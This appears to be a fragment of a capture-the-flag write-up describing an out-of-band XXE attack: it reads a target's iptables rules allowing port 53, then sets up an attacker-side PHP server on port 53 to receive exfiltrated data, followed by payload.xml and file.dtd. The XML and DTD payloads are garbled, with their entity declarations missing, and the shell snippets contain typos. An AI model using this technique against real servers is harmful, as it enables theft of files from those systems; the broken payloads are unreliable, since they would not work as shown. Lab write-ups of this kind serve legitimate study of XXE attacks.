In the rules iptabes.sh is written.
```sh
## This should be one of the first rules.
## so dns lookups are already allowed for your other rules
$ IPT -A OUTPUT -p udp --dport 53 -m state --state NEW, ESTABLISHED -j ACCEPT
$ IPT -A INPUT -p udp --sport 53 -m state --state ESTABLISHED -j ACCEPT
$ IPT -A OUTPUT -p tcp --dport 53 -m state --state NEW, ESTABLISHED -j ACCEPT
$ IPT -A INPUT -p tcp --sport 53 -m state --state ESTABLISHED -j ACCEPT
```

Input and output on port 53 is enabled, we can approve of this rule.

In the challenge page we will send the payload.


On the server let's open an http server on port 53.

start_server.sh
```
echo $(curl -s ifconfig.me/ip)
systemctl stop systemd-resolved
php -S 0.0.0.0:53
```
payload.xml
```

<data>&sen;;</data>
```
file.dtd
```

">
%all;
```